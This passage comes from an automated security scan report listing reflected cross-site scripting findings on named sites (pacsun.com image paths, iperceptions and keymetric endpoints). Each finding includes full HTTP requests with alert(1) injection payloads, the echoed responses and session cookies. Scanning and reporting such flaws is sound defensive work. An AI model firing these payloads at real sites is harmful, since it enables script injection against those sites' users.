Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8982258_01ee1b3<img src=a onerror=alert(1)>4280baca906

3.264. http://images3.pacsun.com/is/image/pacsunproducts/9000597_01_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/9000597_01_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2d5c2<img%20src%3da%20onerror%3dalert(1)>335dd98f5de was submitted in the REST URL parameter 4. This input was echoed as 2d5c2<img src=a onerror=alert(1)>335dd98f5de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/9000597_01_0012d5c2<img%20src%3da%20onerror%3dalert(1)>335dd98f5de?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/9000597_01_0012d5c2<img src=a onerror=alert(1)>335dd98f5de

3.265. http://images3.pacsun.com/is/image/pacsunproducts/9000597_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/9000597_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1afb2<img%20src%3da%20onerror%3dalert(1)>f841bf64a1b was submitted in the REST URL parameter 4. This input was echoed as 1afb2<img src=a onerror=alert(1)>f841bf64a1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/9000597_sw_0011afb2<img%20src%3da%20onerror%3dalert(1)>f841bf64a1b?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:52 GMT
Connection: close

Unable to find /pacsunproducts/9000597_sw_0011afb2<img src=a onerror=alert(1)>f841bf64a1b

3.266. http://images3.pacsun.com/is/image/pacsunproducts/9000597_sw_011 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/9000597_sw_011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b205b<img%20src%3da%20onerror%3dalert(1)>68a15209a5 was submitted in the REST URL parameter 4. This input was echoed as b205b<img src=a onerror=alert(1)>68a15209a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/9000597_sw_011b205b<img%20src%3da%20onerror%3dalert(1)>68a15209a5?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/9000597_sw_011b205b<img src=a onerror=alert(1)>68a15209a5

3.267. http://images3.pacsun.com/is/image/pacsunproducts/9023201_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/9023201_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 21c83<img%20src%3da%20onerror%3dalert(1)>643d48be1b7 was submitted in the REST URL parameter 4. This input was echoed as 21c83<img src=a onerror=alert(1)>643d48be1b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/9023201_0121c83<img%20src%3da%20onerror%3dalert(1)>643d48be1b7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:16 GMT
Connection: close

Unable to find /pacsunproducts/9023201_0121c83<img src=a onerror=alert(1)>643d48be1b7

3.268. http://images3.pacsun.com/is/image/pacsunproducts/9024597_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/9024597_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ec059<img%20src%3da%20onerror%3dalert(1)>917f01586b7 was submitted in the REST URL parameter 4. This input was echoed as ec059<img src=a onerror=alert(1)>917f01586b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/9024597_01ec059<img%20src%3da%20onerror%3dalert(1)>917f01586b7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/9024597_01ec059<img src=a onerror=alert(1)>917f01586b7

3.269. http://images3.pacsun.com/is/image/pacsunproducts/9042383_01_401 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/9042383_01_401

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6b99a<img%20src%3da%20onerror%3dalert(1)>fa4ea1be793 was submitted in the REST URL parameter 4. This input was echoed as 6b99a<img src=a onerror=alert(1)>fa4ea1be793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/9042383_01_4016b99a<img%20src%3da%20onerror%3dalert(1)>fa4ea1be793?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:08 GMT
Connection: close

Unable to find /pacsunproducts/9042383_01_4016b99a<img src=a onerror=alert(1)>fa4ea1be793

3.270. http://images3.pacsun.com/is/image/pacsunproducts/9042383_sw_047 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/9042383_sw_047

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3975<img%20src%3da%20onerror%3dalert(1)>f5b211b3a20 was submitted in the REST URL parameter 4. This input was echoed as b3975<img src=a onerror=alert(1)>f5b211b3a20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/9042383_sw_047b3975<img%20src%3da%20onerror%3dalert(1)>f5b211b3a20?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/9042383_sw_047b3975<img src=a onerror=alert(1)>f5b211b3a20

3.271. http://images3.pacsun.com/is/image/pacsunproducts/9042383_sw_401 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/9042383_sw_401

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1300b<img%20src%3da%20onerror%3dalert(1)>f886d0f9184 was submitted in the REST URL parameter 4. This input was echoed as 1300b<img src=a onerror=alert(1)>f886d0f9184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/9042383_sw_4011300b<img%20src%3da%20onerror%3dalert(1)>f886d0f9184?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:07 GMT
Connection: close

Unable to find /pacsunproducts/9042383_sw_4011300b<img src=a onerror=alert(1)>f886d0f9184

3.272. http://ips-invite.iperceptions.com/webValidator.aspx [cD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ips-invite.iperceptions.com
Path:   /webValidator.aspx

Issue detail

The value of the cD request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 836eb%3balert(1)//a0516d60980 was submitted in the cD parameter. This input was echoed as 836eb;alert(1)//a0516d60980 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webValidator.aspx?sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q-WEB2&cD=90836eb%3balert(1)//a0516d60980&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE04
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Fri, 30 Sep 2011 12:12:15 GMT
Content-Length: 3026

var sID= '35522'; var sC= 'IPE35522';var rF='False'; var brow= 'Chrome'; var vers= '14'; var lID= '1'; var loc= '4Q-WEB2'; var ps='sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q
...[SNIP]...
etLinkerUrl(url, false);
} catch(e){ }
return url;
}var tC= 'IPEt'; var tCv='?'; CCook(tC,tC,0); tCv= GetC(tC);if (GetC(sC)==null && GetC('IPE_S_35522') == null && tCv != null) {CCook(sC,sC,90836eb;alert(1)//a0516d60980); Ld();} DCook(tC);function CCook(n,v,d){var exp= ''; var dm = document.domain;if (d) {var dt= new Date();dt.setTime(dt.getTime()+(d*24*60*60*1000));exp='; expires='+dt.toGMTString();}document.cookie=
...[SNIP]...

3.273. http://ips-invite.iperceptions.com/webValidator.aspx [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ips-invite.iperceptions.com
Path:   /webValidator.aspx

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e2a'%3balert(1)//4083be8c2f8 was submitted in the loc parameter. This input was echoed as d1e2a';alert(1)//4083be8c2f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webValidator.aspx?sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q-WEB2d1e2a'%3balert(1)//4083be8c2f8&cD=90&rF=False&iType=1&domainname=0 HTTP/1.1
Host: ips-invite.iperceptions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE02
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Fri, 30 Sep 2011 12:11:57 GMT
Content-Length: 3030

var sID= '35522'; var sC= 'IPE35522';var rF='False'; var brow= 'Chrome'; var vers= '14'; var lID= '1'; var loc= '4Q-WEB2d1e2a';alert(1)//4083be8c2f8'; var ps='sdfc=e5614d9c-35522-0e3f1f95-2f01-4253-92b6-2beabac31bda&lID=1&loc=4Q-WEB2d1e2a%27%3balert(1)%2f%2f4083be8c2f8&cD=90&rF=False&iType=1&domainname=0';var IPEspeed = 5;var _invite = 'ips-invite
...[SNIP]...

3.274. http://km6633.keymetric.net/KM2.js [hist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the hist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c2ed'%3balert(1)//2185f7adbe6 was submitted in the hist parameter. This input was echoed as 3c2ed';alert(1)//2185f7adbe6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=3c2ed'%3balert(1)//2185f7adbe6&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:14:45 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript
Content-Length: 5126

function km_GetTrackingURL(param) {
var val;
switch (param.toLowerCase()) {
case 'adsource':
val = 'Other Sources'; break;
case 'cpao':
val = '0'; break;
case
...[SNIP]...
TString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmCookieDays = 365;
kmExt = new Date();
kmExt.setTime(kmExt.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmE6633=1:0|15247,3c2ed';alert(1)//2185f7adbe6;expires=' + kmExt.toGMTString() + ';path=/;' + ((cbd)?'domain='+cbd:'');
kmLat = new Date();
kmLat.setTime(kmLat.getTime() + 1000 * 60 * 60 * 24 * kmCookieDays);
document.cookie = 'kmL6633=1|0|Camp
...[SNIP]...

3.275. http://km6633.keymetric.net/KM2.js [lag parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://km6633.keymetric.net
Path:   /KM2.js

Issue detail

The value of the lag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9592'%3balert(1)//4b331517d4 was submitted in the lag parameter. This input was echoed as c9592';alert(1)//4b331517d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KM2.js?x=1&lcc=0&vid=&rnd=0.6996897698845714&las=0&lkw=&lmt=&rho=&rqu=&rqs=&lca=&lag=c9592'%3balert(1)//4b331517d4&lc1=1833889000-1&lc2=&lc3=&lc4=&lc5=&lss=0&lho=www.hertzfurniture.com&lpa=/&lha=&vsq=1&hist=&bfv=10&bcs=1&bje=1&bla=en-us&bsr=1920x1200&bcd=16&btz=360&bge=1 HTTP/1.1
Host: km6633.keymetric.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.hertzfurniture.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 12:13:37 GMT
Server: Microsoft-IIS/6.0
Cache-control: no-cache
P3P: CP="CAO PSA OUR IND"
X-Powered-By: ASP.NET
